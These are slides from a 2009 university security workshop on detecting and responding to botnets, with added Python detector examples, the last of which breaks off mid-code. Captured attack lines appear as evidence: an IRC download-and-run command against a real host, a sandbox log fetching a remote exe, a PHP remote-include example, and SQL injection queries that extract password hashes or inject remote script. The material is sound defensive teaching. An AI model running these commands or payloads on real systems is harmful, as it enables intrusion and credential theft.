Botnet Phd (Piled Higher and Deeper)

A Presentation About

Botnet Detection

For

NWACC 09

Security Workshop by

Craig A Schiller, CISSP-ISSMP,ISSAP

Chief Information Security Officer

Portland State University

Agenda

Introduction

Detection

Forensics/Intel Gathering

Malware Analysis

Incident Response

Prevention

© 2009 Craig A Schiller 2

Primary Source


How Do We Detect Them?

Botnet client lifecycle (diagram):

1. Computer is exploited, by other bot clients or by the user browsing malicious sites, and becomes a bot.
2. New bot rallies to the C&C to let the botherder know it has joined the team.
3. Retrieve the anti-A/V module from a download server; secure the new bot client.
4. Listen to the C&C server/peer for commands.
5. Retrieve the payload module from a download server.
6. Execute the commands (possible traffic to victim).
7. Report result to the C&C channel.
8. On command, erase all evidence and abandon the client.

How Do We Detect Them?

Detection opportunities overlaid on the same lifecycle (diagram):

• Security & firewall logs
• A/V detection
• Known malware distribution sites
• Known C&C sites
• Botlike traffic
• User complaint
• Talking to Darknet
• Bad behavior
• Abuse@ notices
• Anomalous protocol detection

How Do We Detect Them?

Enterprise Reporting

User Help Desk Tickets

Abuse notifications

Quasi-Intelligence Organizations

Monitoring & Analysis

Ourmon

Firewall & Router logs

IDS/IPS – Host and Network

DNS

Server & Workstation Log analysis

Malware analysis

Forensics


Ourmon

Free network security monitoring tool, with botnet detection capabilities
http://ourmon.cat.pdx.edu/ourmon/index.html

Network Anomaly Detection

Is it scanning?

Is it participating in an IRC channel?

Is there a high control-to-data ratio?

Is the IRC server/port listed as a known Command & Control server?

Does the IRC traffic text look botlike?

Did the host lookup or attempt to communicate with a known C&C server?

Did the host attempt to communicate with an IP address in the Darknet?


Network Anomaly Detection

TCP work weight = (SYNs sent + FINs sent + RSTs returned) / total TCP packets

ww = (Syn + Fin + Reset) / Total TCP

• measure of signal/noise (control/data)
• high number means all control (SYN scanner)
• basically means: an IP is scanning
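To show the ratio at work, here is an added example (not Ourmon's code and not from the slides) that computes the work weight per host over a constructed packet trace and flags hosts whose traffic is almost all control packets. Assumed: "total TCP packets" counts packets a host sent and received, and 0.9 is the flagging threshold.

```python
"""TCP work weight, computed from the slide's formula:

    ww = (SYNs sent + FINs sent + RSTs returned) / total TCP packets

A SYN scanner emits almost nothing but control packets, so its ratio
approaches 1; a host moving real data sits near 0.  The packet traces
below are constructed for this example.  Assumptions: "total TCP
packets" counts packets the host sent and received, and 0.9 is the
flagging threshold (Ourmon itself reports ww as a percentage).
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    flags: str  # TCP flag letters as tcpdump prints them: S, A, F, R, P


@dataclass
class Counters:
    syn_sent: int = 0
    fin_sent: int = 0
    rst_returned: int = 0
    total: int = 0


def tally(packets):
    """Per IP: SYNs and FINs it sent, RSTs sent back to it, and every
    TCP packet it was part of."""
    c = defaultdict(Counters)
    for p in packets:
        if "S" in p.flags and "A" not in p.flags:  # pure SYN = connection attempt
            c[p.src].syn_sent += 1
        if "F" in p.flags:
            c[p.src].fin_sent += 1
        if "R" in p.flags:
            c[p.dst].rst_returned += 1  # the reset is "returned" to its receiver
        c[p.src].total += 1
        c[p.dst].total += 1
    return c


def work_weight(counters):
    """Map each IP to its work weight as a fraction in [0, 1]."""
    ww = {}
    for ip, k in counters.items():
        control = k.syn_sent + k.fin_sent + k.rst_returned
        ww[ip] = control / k.total if k.total else 0.0
    return ww


def flag_scanners(ww, threshold=0.9):
    """IPs whose traffic is (almost) all control: the scanners."""
    return sorted(ip for ip, w in ww.items() if w >= threshold)


def scanner_trace(targets=20, answering=15):
    """Constructed: 10.0.0.5 SYN-scans `targets` hosts; `answering` of
    them have nothing listening and reply with RST/ACK."""
    pkts = []
    for i in range(targets):
        victim = f"192.0.2.{i + 1}"
        pkts.append(Packet("10.0.0.5", victim, "S"))
        if i < answering:
            pkts.append(Packet(victim, "10.0.0.5", "RA"))
    return pkts


def download_trace(data_pkts=30):
    """Constructed: 10.0.0.7 fetches a file from 198.51.100.10 in one
    ordinary TCP session (handshake, data + ACKs, FIN exchange)."""
    c, s = "10.0.0.7", "198.51.100.10"
    pkts = [Packet(c, s, "S"), Packet(s, c, "SA"), Packet(c, s, "A")]
    for _ in range(data_pkts):
        pkts.append(Packet(s, c, "PA"))  # server pushes a data segment
        pkts.append(Packet(c, s, "A"))   # client acknowledges it
    pkts += [Packet(c, s, "FA"), Packet(s, c, "FA"), Packet(c, s, "A")]
    return pkts


if __name__ == "__main__":
    ww = work_weight(tally(scanner_trace() + download_trace()))
    for ip in ("10.0.0.5", "10.0.0.7"):
        print(f"{ip:>14}  ww={ww[ip]:.2f}")
    print("scanners:", flag_scanners(ww))
```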

Network Anomaly Detection

Ourmon does a similar calculation with IRC traffic

• measure of signal/noise (control/data): high number means non-human communication
• basically means: a bot or an application (game)

Recent large DDoS attack

The fundamental pkts graph normally looks like this: (graph)

Ouch, ouch, ouch!

That’s 869k pps – we have a physical GigE connection to the Internet …

“Botlike” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172 PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]

“Normal” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172 PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]
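An added example (not Ourmon's code) that parses the IRCMSG record format shown on these two slides and scores the PRIVMSG text for command-line indicators; the two records are the slides' own samples, while the indicator patterns and the score threshold are this example's assumptions.

```python
"""Parse Ourmon-style IRCMSG records and score the PRIVMSG text for
command-like content.  The two records are the slides' own samples;
the indicator patterns and the threshold are this example's assumptions.
"""
import re
from dataclasses import dataclass

IRCMSG_RE = re.compile(
    r"IRCMSG: (?P<kind>\w+): s=(?P<src>\S+) -> d=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"sflag=(?P<sflag>\d+), channel=(?P<channel>\S+) clen=(?P<clen>\d+): p=\[(?P<payload>.*)\]$"
)
# IRC line inside p=[...]: ":nick!user@host PRIVMSG #chan :text"
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)!(?P<user>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

# Things a human rarely types in chat but a botherder types all the time.
INDICATORS = [
    re.compile(r"\b(curl|wget|perl|python|chmod|nohup)\b"),  # download / run tools
    re.compile(r"\brm\s+-r?f\b"),                            # cleanup of droppers
    re.compile(r"https?://\S+"),                             # fetch location
    re.compile(r"\s-[a-zA-Z]\b"),                            # command-line switches
    re.compile(r";"),                                        # chained shell commands
]


@dataclass
class IrcRecord:
    src: str
    dst: str
    dport: int
    channel: str
    nick: str
    text: str


def parse_record(line):
    m = IRCMSG_RE.search(line.strip())
    if not m:
        raise ValueError("not an IRCMSG record")
    pm = PRIVMSG_RE.match(m["payload"].strip())
    if not pm:
        raise ValueError("payload is not a PRIVMSG")
    return IrcRecord(m["src"], m["dst"], int(m["dport"]), m["channel"],
                     pm["nick"], pm["text"].strip())


def botlike_score(text):
    """Number of distinct indicator classes present in the message text."""
    return sum(1 for pat in INDICATORS if pat.search(text))


def classify(line, threshold=2):
    """Return (record, score, 'botlike' | 'normal')."""
    rec = parse_record(line)
    score = botlike_score(rec.text)
    return rec, score, ("botlike" if score >= threshold else "normal")


# The two slide samples, one record per line (constructed from the slides).
SAMPLES = [
    "IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, "
    "channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172 PRIVMSG #priv8 :fmj curl -o "
    "mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]",
    "IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, "
    "channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172 PRIVMSG #priv8 : OMG, you're "
    "just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you.]",
]

if __name__ == "__main__":
    for line in SAMPLES:
        rec, score, label = classify(line)
        print(f"{rec.src} -> {rec.dst}:{rec.dport} #{rec.channel} <{rec.nick}> score={score} {label}")
```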

Snort signatures

No general purpose intrusion detection.

Limited set of Bot related signatures


Incident Detection examples

1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka

[**] [1:3111116:1] Mcafee http feed: : http://bluebookcarpices.com/ < http://pices.com/ > (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP
TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 345145726 2079777105

2. today, zlob, 131.252.243.80, pri=hi

[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP
TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45

Quasi-Intelligence Organizations

REN-ISAC

Shadowserver

Nanog

APWG

Mailing lists

• Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
• Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
• Vendor

ISC Storm Center
http://www.emergingthreats.net/
http://www.malwaredomainlist.com

Quasi-Intelligence Organizations


Lists of Known C&C servers

Shadow Server Sample

IP Address     | Country | Region  | State    | Domain       | ASN   | AS Name  | AS Description
81.211.7.122   | RU      | MOSCOW  | MOSKVA   | GLDN.NET     | 3216  | SOVAM    | AS Golden Telecom, Moscow, Russia
69.18.206.194  | US      | COMMACK | NEW YORK | INVISION.COM | 12251 | INVISION | Invision.com, Inc.
81.211.7.122   | RU      | MOSCOW  | MOSKVA   | GLDN.NET     | 3216  | SOVAM    | AS Golden Telecom, Moscow, Russia
69.18.206.194  | US      | COMMACK | NEW YORK | INVISION.COM | 12251 | INVISION | Invision.com, Inc.
81.211.7.122   | RU      | MOSCOW  | MOSKVA   | GLDN.NET     | 3216  | SOVAM    | AS Golden Telecom, Moscow, Russia
69.18.206.194  | US      | COMMACK | NEW YORK | INVISION.COM | 12251 | INVISION | Invision.com, Inc.
81.211.7.122   | RU      | MOSCOW  | MOSKVA   | GLDN.NET     | 3216  | SOVAM    | AS Golden Telecom, Moscow, Russia
69.18.206.194  | US      | COMMACK | NEW YORK | INVISION.COM | 12251 | INVISION | Invision.com, Inc.
213.234.193.74 | RU      | MOSCOW  | MOSKVA   | NET.RU       | 39442 | UNICO    | AS JSC UNICO
85.21.82.55    | RU      | MOSCOW  | MOSKVA   | -            | 8402  | CORBINA  | AS Corbina Telecom

Port and Channel columns (only five values are shown on the slide):

Port | Channel
3267 | #B#t[r2]N#t
3267 | #B#tN#t[r3]
3267 | #B�t[r2]N�t
3267 | #B.tN.t[r3]
6667 | #secured

http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1
http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP

Quasi-Intelligence Organizations

REN-ISAC

Supported by Indiana University and through relationship with EDUCAUSE and Internet2, the REN-ISAC is an integral part of higher education’s strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.

The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs, DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.

Spamhaus Drop List

The Spamhaus Don't Route Or Peer List

DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use by firewalls and routing equipment.

DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.

The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or 100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.

When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and DDoS attacks originating on rogue netblocks.

Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.

Spamhaus Drop List excerpt 9/17/09


Malware Domain List

DNS for Botnet Detection

I checked and I didn’t see anything

DB of all lookups for:
• Known C&C
• Known malicious SW distros

http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html

knujon

10 Most Offensive Registrars

1. XIN NET (second time at #1)
2. eNom
3. Network Solutions
4. Register.com
5. PLANETONLINE
6. RegTime
7. OnlineNIC
8. SpotDomains (domainsite)
9. Wild West
10. HICHINA Web Solutions

Search Engine Spam & Clicks 4 Hire

Use Google to search for Clicks-4-Hire relays and search engine spam:

site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"

Google site search results (screenshot)

An owned webpage


Browser Intelligence gathering


Links to this web page


Man in the Browser Attack - torpig


Forensics/Intel Gathering

• Quick Forensics
  • Log Analysis
  • Process Explorer
  • TCPView
  • AutoRuns
  • Process Monitor
  • Rapier – First Responder Tool
• Automated Forensics
  • Consistent information gathered regardless of who runs it
• Sleuthing
  • How did they get in?
  • What does it do?
  • What files are used?
  • When did what happen?
• Malware Analysis
• More Sleuthing

Log analysis

I checked and I didn’t see anything


Forensics/Intel Gathering example

Process Explorer listing (screenshot; columns Process, PID, CPU, Description, Company Name). Processes shown: System Idle Process (PID 0), Interrupts (Hardware Interrupts), DPCs (Deferred Procedure Calls), System (PID 4), smss.exe (Windows NT Session Manager), csrss.exe (Client Server Runtime Process), winlogon.exe (Windows NT Logon Application), services.exe (Services and Controller app), several svchost.exe instances (Generic Host Process for Win32 Services), wmiprvse.exe (WMI), init and inetd (Interix Utility), PSXSS.EXE (Interix Subsystem Server), iexplorer.exe, explorer.exe (Windows Explorer), ccApp.exe (Symantec User Session), VPTray.exe and VPC32.exe (Symantec AntiVirus), a second iexplorer.exe, and sqlmangr.exe (SQL Server Service Manager).


Forensics/Intel Gathering example

Strings in the file iexplorer.exe

Strings in memory


Centralized Logging

Diagram: NTSyslog on the Windows hosts forwards event logs across the Internet to a log collection server; the collected logs go into a MySQL database for analysis.

Workstation Log Analysis

Log Parser
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en

A/V Centralized Reporting

Use (examine) the central reporting feature of your antivirus server.

Blocked by port blocking rule

Date      | Time        | Process                        | Rule                                         | Remote address
3/25/2008 | 12:56:26 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 202.57.184.145:6666
3/25/2008 | 6:26:40 PM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 83.252.58.149:6666
3/25/2008 | 8:55:30 PM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 85.21.246.228:6666
3/25/2008 | 11:24:38 PM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 80.222.68.139:6667
3/26/2008 | 3:37:41 AM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 85.21.246.228:6666
3/26/2008 | 5:07:33 AM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 85.21.246.228:6666
3/26/2008 | 7:23:09 AM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 80.222.68.139:6667
3/26/2008 | 7:38:59 AM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 85.21.246.228:6666
3/26/2008 | 7:54:09 AM  | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 80.222.68.139:6667
3/26/2008 | 10:40:04 AM | C:\Program Files\DNA\btdna.exe | Prevent IRC communication                    | 85.21.246.228:6666
3/26/2008 | 10:54:53 AM | C:\Program Files\DNA\btdna.exe | Prevent mass mailing worms from sending mail | 41.220.121.130:25

A/V Centralized Reporting

5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced)
PSU\anyman
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\MediaTubeCodec_ver1.556.0[1].exe
Common Standard Protection: Prevent common programs from running files from the Temp folder
Action blocked : Execute

MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.

This appeared in the logs before McAfee could detect this malware.

A/V Centralized Reporting

What does quarantine or “No Action Taken” mean?

User defined detection: SPYWARE (Potentially Unwanted Program)

5/12/2008 9:01:50 AM No Action Taken (Delete failed)

SYSTEM McShield.exe

C:\Documents and Settings\anyman\Desktop\ctfmona.exe

5/12/2008 9:02:31 AM User defined detection : No Action Taken

( Clean failed because the detection isn't cleanable )

SYSTEM McShield.exe

C:\Documents and Settings\anyman\Desktop\ctfmona.exe


Detectable Behavior

Multi-homed DNS
– FQDN maps to 3 or more IP addresses, e.g.:
  botnet1.example.com pointing to 127.0.0.1
  botnet1.example.com pointing to 127.0.0.2
  botnet1.example.com pointing to 127.0.0.3
  botnet1.example.com pointing to 127.0.0.4
  botnet1.example.com pointing to 127.0.0.5
  botnet1.example.com pointing to 127.0.0.6

Dynamic DNS used thru commercial site
– Change IP addresses quickly

Short DNS TTLs for clients
– Remap DNS often, check at boot

FastFlux DNS
– Change IP addresses and/or DNS names quickly (for spam < 5 minutes) and often
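As an added example, not from the slides, the following scores DNS answer sets for the behaviours above: the three-or-more-addresses rule and the sub-five-minute TTL come from the slide, while the churn cut-off between successive lookups and all the answer data are constructed assumptions.

```python
"""Score DNS answer sets for the behaviours on this slide: many A records
for one name (multi-homed), short TTLs, and IPs that churn between
successive lookups (fast flux).  Answer sets are constructed; the
3-address rule and the 300 s TTL (the slide's "< 5 minutes") come from
the slide, the 50 % churn cut-off is an assumption.
"""
from dataclasses import dataclass

MULTIHOMED_MIN_IPS = 3   # slide: "FQDN maps to 3 or more IP addresses"
SHORT_TTL_SECONDS = 300  # slide: flux for spam remaps in < 5 minutes
CHURN_SUSPECT = 0.5      # assumption: half the IPs replaced per lookup


@dataclass(frozen=True)
class ARecord:
    name: str
    ttl: int
    ip: str


def churn(previous, current):
    """Fraction of the current answer set that was absent last time."""
    if not current:
        return 0.0
    return len(current - previous) / len(current)


def assess(lookups):
    """lookups: successive answer sets (lists of ARecord), oldest first.
    Returns per name: distinct IP count, minimum TTL, peak churn, and
    the two verdicts."""
    seen = {}        # name -> every IP ever returned
    last = {}        # name -> IP set from the previous lookup
    min_ttl = {}
    peak_churn = {}
    for answers in lookups:
        by_name = {}
        for r in answers:
            by_name.setdefault(r.name, set()).add(r.ip)
            min_ttl[r.name] = min(min_ttl.get(r.name, r.ttl), r.ttl)
        for name, ips in by_name.items():
            seen.setdefault(name, set()).update(ips)
            if name in last:
                peak_churn[name] = max(peak_churn.get(name, 0.0), churn(last[name], ips))
            last[name] = ips
    report = {}
    for name, ips in seen.items():
        multi = len(ips) >= MULTIHOMED_MIN_IPS
        flux = (multi and min_ttl[name] < SHORT_TTL_SECONDS
                and peak_churn.get(name, 0.0) >= CHURN_SUSPECT)
        report[name] = {"ips": len(ips), "min_ttl": min_ttl[name],
                        "churn": peak_churn.get(name, 0.0),
                        "multi_homed": multi, "fast_flux_suspect": flux}
    return report


def sample_lookups():
    """Constructed: two lookups ten minutes apart.  botnet1.example.com is
    the slide's multi-homed name (six loopback addresses, long TTL);
    flux.example.net swaps all its addresses with a short TTL;
    www.example.org is an ordinary single-address host."""
    botnet1 = [ARecord("botnet1.example.com", 3600, f"127.0.0.{i}") for i in range(1, 7)]
    normal = [ARecord("www.example.org", 86400, "203.0.113.10")]
    flux1 = [ARecord("flux.example.net", 180, ip)
             for ip in ("198.51.100.7", "198.51.100.90", "203.0.113.55")]
    flux2 = [ARecord("flux.example.net", 180, ip)
             for ip in ("192.0.2.33", "203.0.113.201", "198.51.100.14")]
    return [botnet1 + normal + flux1, botnet1 + normal + flux2]


if __name__ == "__main__":
    for name, verdict in assess(sample_lookups()).items():
        print(f"{name:22} {verdict}")
```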

Hiding the C&C Server or Phishing Website

The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

Passive DNS

http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html

Fast Flux DNS example

Internal Intelligence gathering

Rapier

A First Responder Toolkit

Developed by Steve Mancini, Intel
http://code.google.com/p/rapier/

Rapier

Malware Hash Registry

Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.

Using whois

$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74

RESPONSE

e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53

(fields: hash, last-seen Unix time in seconds since midnight 1970-01-01, % A/V package detection rate)

Using DNS (dig)

$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT

RESPONSE

"1221154281 53"

http://www.team-cymru.org/Services/MHR/
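An added example (not Team Cymru's code) that builds both query forms shown above, parses the two-field answer into a last-seen time and a detection rate, and treats no answer as "hash unknown to the registry"; the resolver is injected so the example runs offline, and canned_resolver, which answers only for the slide's MD5, is an assumption.

```python
"""Build Team Cymru Malware Hash Registry queries the way the slide does
(whois and DNS TXT) and parse the two-field answer.  The resolver is
injected so the example runs offline; the canned answer is the slide's
own "1221154281 53".  Added example, not Team Cymru's code.
"""
import hashlib
import re
from datetime import datetime, timezone

MHR_DNS_ZONE = "malware.hash.cymru.com"
MHR_WHOIS_HOST = "hash.cymru.com"
HEX_HASH = re.compile(r"^[0-9a-f]{32}$|^[0-9a-f]{40}$")  # MD5 or SHA-1, as on the slide
# whois echoes "<hash> <unix time> <rate>"; dig returns "<unix time> <rate>" in quotes
ANSWER_RE = re.compile(r'^"?(?:[0-9a-f]{32}\s+|[0-9a-f]{40}\s+)?(\d+)\s+(\d+)"?$')


def normalize(digest):
    """Lower-case hex digest; reject anything that is not MD5/SHA-1 sized."""
    d = digest.strip().lower()
    if not HEX_HASH.match(d):
        raise ValueError(f"not an MD5/SHA-1 hex digest: {digest!r}")
    return d


def dns_query_name(digest):
    """733a48a9...8d00 -> 733a48a9...8d00.malware.hash.cymru.com (ask for TXT)."""
    return f"{normalize(digest)}.{MHR_DNS_ZONE}"


def whois_command(digest):
    return f"whois -h {MHR_WHOIS_HOST} {normalize(digest)}"


def parse_answer(txt):
    """'"1221154281 53"' -> (last_seen as UTC datetime, detection rate %).
    Returns None when there was no answer (hash unknown to the registry)."""
    if txt is None:
        return None
    m = ANSWER_RE.match(txt.strip().lower())
    if not m:
        raise ValueError(f"unexpected MHR answer: {txt!r}")
    last_seen = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
    return last_seen, int(m.group(2))


def check_file(data, resolver):
    """Hash the bytes, query through the injected resolver (query name ->
    TXT string or None), and return (digest, parsed verdict or None)."""
    digest = hashlib.md5(data).hexdigest()
    return digest, parse_answer(resolver(dns_query_name(digest)))


def canned_resolver(name):
    """Constructed stand-in for dig: knows only the slide's MD5 (assumption)."""
    known = {dns_query_name("733a48a9cb49651d72fe824ca91e8d00"): '"1221154281 53"'}
    return known.get(name)


if __name__ == "__main__":
    print(whois_command("e1112134b6dcc8bed54e0e34d8ac272795e73d74"))
    seen, rate = parse_answer(canned_resolver(dns_query_name("733a48a9cb49651d72fe824ca91e8d00")))
    print(f"last seen {seen.isoformat()}, detected by {rate}% of A/V packages")
    print(check_file(b"constructed harmless bytes", canned_resolver))  # (digest, None)
```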

Alternate C&C Methods

I checked and I didn’t see anything

Echo-based means the bot would simply announce its existence to the C&C. There are several ways of doing this with different volumes of data relayed.

• Connect & forget
• File data
• URL data

Command-Based Botnets

• Web GUI based
  • Push rather than pull
• P2P
• IM
• Social Networking (MySpace profiles)
• Remote Administration Tools
  • Dameware
  • CarbonCopy
  • Terminal Services
  • PC Anywhere
  • RDP
• Drop zone – ftp is the leading protocol here
  • ftp – phishing C&C regularly reports back (echoes) to an FTP C&C

Incident Response

Required by OUS Information Security policy

PSU Information Security policy requires an Incident Response plan

PSU has several means of discovering incidents


Carsten Willems’ CWSandbox

Layers (diagram): Ubuntu, VMWare, XP Pro

Malware analysis

<scanner name="CWSandbox" signature_file_version="6.37.0.90">
  <classification>WORM/Rbot.219136.17</classification>
  <additional_info />
</scanner>
<connections_outgoing>
  <connection transportprotocol="TCP" remoteaddr="192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">
    <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245">
      <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" />
      <privmsg_deleted value=":|00||-X-||1049!~ieiib@93B8CCFE.DDC369E0.FCF5B135.IP PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." />
    </irc_data>
  </connection>

Analyzing the Malware

CWSandbox Analysis


The Future

Honeypots


Responding to Detection


Blocking Organized Crime supporters

If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.

Use the Spamhaus DROP list to block known evil sites.

Intercage, Inhoster, and Nevacon:

85.255.112.0/20 #SBL36702 (85.255.112.0 - 85.255.127.255)
69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
194.146.204.0/22 #SBL51152 (194.146.204.0 - 194.146.207.255)

Blog that tracks RBN activities: http://rbnexploit.blogspot.com/

How do they get into User systems?

Guessing weak passwords/phishing attacks

Exploiting Network vulnerabilities

Using Social Engineering

Using web-based Trojans

Trojan websites – Game cheats

Trojan websites - Pornography

Using Email-based Trojans

Phishing & Pharming

Trojan downloads

Using IM-based Trojans (Social engineering)

Rogue dhcp server serving malicious DNS server

How do they get into Servers? – PHP includes

Vulnerable code on Target.com:

<?php include($vuln); ?>

1. Attacker sends GET /a.php?vuln=http://webhost.com/evil.php to Target.com
2. Target makes a request to webhost.com/evil.php
3. Malware PHP file ‘evil.php’ is sent to Target.com and is executed by the include() function.
4. The output from evil.php is sent to the Attacker.

How do they get into Servers? – SQL Injection

--c295b75d-A--
[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3 45819 192.168.22.155 80
--c295b75d-B--
GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.somwhere-in.pdx.edu
Connection: close
--c295b75d-H--
mod-sec
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1212486727810932 339469 (2354 3333 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--c295b75d-Z--

Obfu73ca74ion

page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A

decodes to:

-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
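Added example, not from the slides or from ModSecurity: a decoder for the percent-encoding and 0x hex-literal obfuscation shown above, run over the two parameter values from these log entries and scored with this example's own (assumed) injection markers, as a log reviewer would.

```python
"""Decode the kind of obfuscated SQL-injection parameter shown on this
slide (percent-encoding plus MySQL 0x... hex string literals) and flag
it the way a log reviewer would.  Sample values are the slide's two log
entries; the detection patterns are this example's own, not ModSecurity's.
"""
import re
from urllib.parse import unquote_plus

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)\b")
SQLI_MARKERS = [
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    re.compile(r"\bconcat\s*\(", re.I),
    re.compile(r"\bchar\s*\(\s*\d+", re.I),
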